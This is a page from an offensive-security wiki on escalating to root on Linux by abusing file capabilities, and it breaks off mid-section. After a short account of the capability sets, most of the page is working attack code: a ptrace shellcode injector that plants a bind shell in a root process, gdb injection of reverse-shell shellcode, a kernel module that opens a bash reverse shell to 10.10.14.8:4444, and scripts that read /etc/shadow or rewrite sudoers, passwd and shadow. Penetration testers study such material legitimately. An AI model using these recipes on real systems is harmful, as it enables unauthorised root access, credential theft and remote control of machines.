Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • 🛠️Maltego
      • 🛠️Specialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • 🛠️DLL Injection
        • 🛠️CreateRemoteThread Injection
        • 🛠️Reflective DLL Injection
        • 🛠️NtMapViewOfSection Injection
        • 🛠️SetWindowHookEx Injection
        • 🛠️PoolParty
        • 🛠️MockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • 🛠️Sliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • 🛠️MS Office - Excel 4.0 (XLM) Macros
          • 🛠️MS Office - VBA Stomping
          • 🛠️MS Office - Remote Dotm Template Injection
        • 🛠️Phishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • 🛠️Udev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • 🛠️Load Unsigned Drivers
        • 🛠️Minifilter Altitude
        • 🛠️Hypervisor Code Integrity (HVCI) Disallowed Images
        • 🛠️Windows Filtering Platform (WFP)
        • 🛠️Userland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • 🛠️Commandline Obfusaction
        • 🛠️PE Obfuscation
        • 🛠️String Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • 🛠️PowerShell Constrained Language Mode (CLM) Bypass
      • 🛠️Kill Windows Defender
      • 🛠️Virtualization-based security (VBS) Bypass
        • 🛠️Credential Guard bypass
        • 🛠️hypervisor-protected code integrity (HVCI) Bypass
        • 🛠️Windows Defender Application Control (WDAC) Bypass
      • 🛠️Sandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • 🛠️Process & Services
    • Privilege Escalation
      • Windows
        • Tools ⚙️
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • 🛠️DLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • 🛠️DirtyCow
          • 🛠️RDS
          • 🛠️Full Nelson
          • 🛠️Mempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • 🛠️Joomla
        • 🛠️Drupal
        • 🛠️Bolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • 🛠️Django
        • 🛠️Flask
        • 🛠️Laravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • 🛠️Java Deserialization
          • 🛠️Ruby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • 🛠️File Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • 🛠️RPC Port Mapper
      • 🛠️FTP
      • 🛠️Telnet
      • 🛠️MySQL
    • WiFi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools ⚙️
        • PowerView ⚙️
        • Responder ⚙️
        • BloodHound ⚙️
        • enum4linux ⚙️
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • 🛠️DC Shadow
      • 🛠️Access controls
  • 🛠️Cloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • 🛠️HTTP API V2
      • 🛠️Kubernetes
      • 🛠️GitLab
      • 🛠️Github
      • 🛠️Gitea
      • 🛠️Jenkins
      • 🛠️Terraform
    • Azure Pentesting
      • Reconnaissance
        • Tools ⚙️
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • 🛠️Smart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Capabilities Sets
  • Practice
  • Processes Capabilities
  • Binaries Capabilities
  • Setcap with SUID/SUDO
  • Interesting Capabilities
  • References

Was this helpful?

Edit on GitHub
  1. Red-Teaming
  2. Privilege Escalation
  3. Linux

Capabilities

Theory

Linux capabilities provide a subset of the available root privileges to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation

Capabilities Sets

Conceptually capabilities are maintained in sets, which are represented as bit masks. For all running processes capability information is maintained per thread; for binaries in the file system it’s stored in extended attributes. Thread capability sets are copied on fork() and specially transformed on execve()

CapEff is the effective capability set represents all capabilities the process is using at the moment (this is the actual set of capabilities that the kernel uses for permission checks). For file capabilities the effective set is in fact a single bit indicating whether the capabilities of the permitted set will be moved to the effective set upon running a binary. This makes it possible for binaries that are not capability-aware to make use of file capabilities without issuing special system calls.

CapPrm is a superset of capabilities that the thread may add to either the thread permitted or thread inheritable sets. The thread can use the capset() system call to manage capabilities: It may drop any capability from any set, but only add capabilities to its thread effective and inherited sets that are in its thread permitted set. Consequently it cannot add any capability to its thread permitted set, unless it has the cap_setpcap capability in its thread effective set.

CapInh, using the inherited set all capabilities that are allowed to be inherited from a parent process can be specified. This prevents a process from receiving any capabilities it does not need. This set is preserved across an execve and is usually set by a process receiving capabilities rather than by a process that’s handing out capabilities to its children.

CapBnd, With the bounding set it’s possible to restrict the capabilities a process may ever receive. Only capabilities that are present in the bounding set will be allowed in the inheritable and permitted sets.

CapAmb is the ambient capability set applies to all non-SUID binaries without file capabilities. It preserves capabilities when calling execve. However, not all capabilities in the ambient set may be preserved because they are being dropped in case they are not present in either the inheritable or permitted capability set. This set is preserved across execve calls.

Practice

Processes Capabilities

We can can find the capabilities of a process as follow

#List current process capabilities
cat /proc/self/status | grep Cap
cat /proc/$$/status | grep Cap
capsh --print

#List capabilities of <PID> process
cat /proc/<PID>/status | grep Cap

Using the capsh utility we can decode them into the capabilities name.

capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37

Binaries Capabilities

Binaries can have capabilities that can be used while executing. We can search binaries with capabilities as follow

getcap -r / 2>/dev/null

Having the capability =ep means the binary has all the capabilities

Setcap with SUID/SUDO

If you found the setcap binary with the SUID bit or with SUDO permissions, you can obtain root access.

#SUID
$ find / -type f -perm -4000 2>/dev/null
/usr/sbin/setcap

#SUDO
$ sudo -l
    (root) NOPASSWD: /usr/sbin/setcap /home/<user>/*

For example, we can leverage the CAP_SETUID capabilities with the python binary

#SUID setcap example
cp /usr/bin/python3 /home/<user>/python3
setcap cap_setuid+ep /home/<user>/python3

#Exploit
/home/<user>/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Interesting Capabilities

CAP_SYS_ADMIN

Retaining this capability is often necessary for containers which mimic entire systems versus individual application containers which can be more restrictive. Among other things this allows to mount devices or abuse release_agent to escape from the container.

For example, if python have the CAP_SYS_ADMIN capabilities, we can mount a modified passwd file on top of the real passwd file.

$ getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_admin+ep

First generate the new passwd file

cp /etc/passwd ./ #Create a copy of the passwd file
openssl passwd -1 -salt abc password #Get hash of "password"
vim ./passwd #Change roots passwords of the fake passwd file

Then we can use the following python script to mount it

from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/path/to/fake/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

CAP_SYS_PTRACE

For example, if python have the CAP_SYS_PTRACE capabilities, we can inject a shellcode in a root process memory.

$ getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_ptrace+ep

We can use the following python code to inject our shellcode

import ctypes
import sys
import struct
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]

libc = ctypes.CDLL("libc.so.6")

pid=int(sys.argv[1])

# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64

# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()

# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
print("Instruction Pointer: " + hex(registers.rip))
print("Injecting Shellcode at: " + hex(registers.rip))

# Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)
shellcode =  "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

# Inject the shellcode into the running process byte by byte.
for i in range(0,len(shellcode),4):
    # Convert the byte to little endian.
    shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
    shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
    shellcode_byte=int(shellcode_byte_little_endian,16)

    # Inject the byte.
    libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)

print("Shellcode Injected!!")

# Modify the instuction pointer
registers.rip=registers.rip+2

# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
print("Final Instruction Pointer: " + hex(registers.rip))

# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)

Now we can execute, and connect to the bind shell

#On target host
$ python2.7 ptrace.py <ROOT_PROCESS_PID>

#On attacking host
$ nc TARGET_IP 5600

Here is an other PrivEsc example with gdb if it have the CAP_SYS_PTRACE enabled

$ getcap -r / 2>/dev/null
/usr/bin/gdb = cap_sys_ptrace+ep

First, create a shellcode with msfvenom and python

# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f py -o revshell.py
buf =  b""
buf += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
buf += b"\x48\x97\x48\xb9\x02\x00\x23\x29\x0a\x0a\x0e\x0b"
buf += b"\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
buf += b"\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
buf += b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
buf += b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6"
buf += b"\x0f\x05"

# Divisible by 8
payload = b"\x90" * (8 - len(buf) % 8 ) + buf

# Change endianess and print gdb lines to load the shellcode in RIP directly
for i in range(0, len(buf), 8):
	chunk = payload[i:i+8][::-1]
	chunks = "0x"
	for byte in chunk:
		chunks += f"{byte:02x}"

	print(f"set {{long}}($rip+{i}) = {chunks}")

Then, debug a root process with gdb ad copy-paste the previously generated gdb lines:

# In this case there was a sleep run by root
## NOTE that the process you abuse will die after the shellcode
/usr/bin/gdb -p $(pgrep sleep)
[...]
(gdb) set {long}($rip+0) = 0x296a909090909090
(gdb) set {long}($rip+8) = 0x5e016a5f026a9958
(gdb) set {long}($rip+16) = 0x0002b9489748050f
(gdb) set {long}($rip+24) = 0x48510b0e0a0a2923
(gdb) set {long}($rip+32) = 0x582a6a5a106ae689
(gdb) set {long}($rip+40) = 0xceff485e036a050f
(gdb) set {long}($rip+48) = 0x6af675050f58216a
(gdb) set {long}($rip+56) = 0x69622fbb4899583b
(gdb) set {long}($rip+64) = 0x8948530068732f6e
(gdb) set {long}($rip+72) = 0x050fe689485752e7
(gdb) c
Continuing.
process 207009 is executing new program: /usr/bin/dash
[...]

CAP_SYS_MODULE

This could lead to trivial privilege escalation and ring-0 compromise. The kernel can be modified at will, subverting all system security, Linux Security Modules, and container systems.

This means that you can insert/remove kernel modules in/from the kernel of the host machine.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_module+ep

In order to abuse this, lets create a fake lib/modules folder

mkdir lib/modules -p
cp -a /lib/modules/$(uname -r)/ lib/modules/$(uname -r)

Create the kernel module that is going to execute a reverse shell and the Makefile to compile it

reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Makefile
obj-m +=reverse-shell.o

all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

The blank char before each make word in the Makefile must be a tab, not spaces!

We can compile it using our Makefile and the make command

make

If you can't find the /lib/modules/<version>/build folder, this is because you have not download the linux headers of your kernel version

Finally, we can execute this python code

#On target machine
$ cat exploit.py
import kmod
km = kmod.Kmod()
km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/")
km.modprobe("reverse-shell")

$ python exloit.py

#On attacking machine 
nc -lvnp 4444

In the following example the kmod binary has this capability.

getcap -r / 2>/dev/null
/bin/kmod = cap_sys_module+ep

It means that it's possible to use the command insmod to insert a kernel module. We can use the same C code seen in the previous example to get a reverse shell abusing this privilege.

reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Makefile
obj-m +=reverse-shell.o

all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

The blank char before each make word in the Makefile must be a tab, not spaces!

We can compile it using our Makefile and the make command

make

If you can't find the /lib/modules/<version>/build folder, this is because you have not download the linux headers of your kernel version

Finally, load the module using insmode

#On target machine
insmod reverse-shell.ko #Launch the reverse shell

#On attacking machine
nc -lvnp 4444

CAP_DAC_READ_SEARCH

This means that you can bypass can bypass file read permission checks and directory read/execute permission checks.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_dac_read_search+ep

We can abuse it to read the /etc/shadow file

$ cat exploit.py
print(open("/etc/shadow", "r").read())

$ python3.11 exploit.py

In the following example the tar binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/tar = cap_dac_read_search+ep

We can abuse it to read the /etc/shadow file

LFILE=/etc/shadow
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'

Alternatively, we can do as follow

cd /etc
tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp
cd /tmp
tar -cxf shadow.tar.gz

CAP_DAC_OVERRIDE

This mean that you can bypass write permission checks on any file, so you can write any file.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_dac_override+ep

We can abuse it to override the /etc/sudoer file

$ cat exploit.py
file=open("/etc/sudoers","a")
file.write("yourusername ALL=(ALL) NOPASSWD:ALL")
file.close()

$ python3 exploit.py

We can now spawn an elevated shell

$ sudo /bin/bash
#or
$ sudo su

Alternatively, we can overwritte the /etc/passwd file. First we have to generate a new password hash

#Using mkpasswd
$ mkpasswd  -m sha-512 -S saltsalt -s
Mot de passe : password1
$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/

#Or with openssl
$ openssl passwd -6 password1
$6$5h9QsTjUEHVIFVwK$3MkSX5prCEkZax7z5ixV1hdmAghcAGTjX2gAyMFjcAYxYQ00H7xQvskRRi/y.0ouz0sRpqGUWzORK0MdAGv7b0

Then, use the following script to edit the /etc/passwd file

$ cat exploit.py

import sys

password = sys.argv[1]

contents = []
with open("/etc/passwd") as file:
    for line in file:
        if line.startswith("root"):
            contents.append(line.replace(":x:", ":%s:" % password))
        else:
            contents.append(line)
    pass

with open("/etc/passwd", "w") as file:
    file.writelines(contents)

print("done")

$ python3.11 exploit.py '$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/'
$ head -n1 /etc/passwd
root:$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/:0:0:root:/root:/usr/bin/zsh

We can now easily su as root

su - root

In the following example the vim binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/vim = cap_dac_override+ep

We can abuse it to override the /etc/shadow file. First we can generate a new password hash

#Using mkpasswd
$ mkpasswd  -m sha-512 -S saltsalt -s
Mot de passe : password1
$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/

#Or with openssl
$ openssl passwd -6 password1
$6$5h9QsTjUEHVIFVwK$3MkSX5prCEkZax7z5ixV1hdmAghcAGTjX2gAyMFjcAYxYQ00H7xQvskRRi/y.0ouz0sRpqGUWzORK0MdAGv7b0

Now we can just vim the /etc/passwd file and replace the root hash by the generated one

$ vim /etc/shadow
$ head -n1 /etc/shadow
root:$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/:17673:0:99999:7:::

We can now easily su as root

su - root

CAP_CHOWN

This means that it's possible to change the ownership of any file.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_chown+ep

We can abuse it to modify the file owner of the /etc/shadow file or the /root. First we can check what is our current user id

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Replace the attribute numbers with the current user id.

#Get /etc/shadow
$ python -c 'import os;os.chown("/etc/shadow",33,33)'

#Get /root directory
$ python -c 'import os;os.chown("/root",33,33)'

We can now generate a new hash

#Using mkpasswd
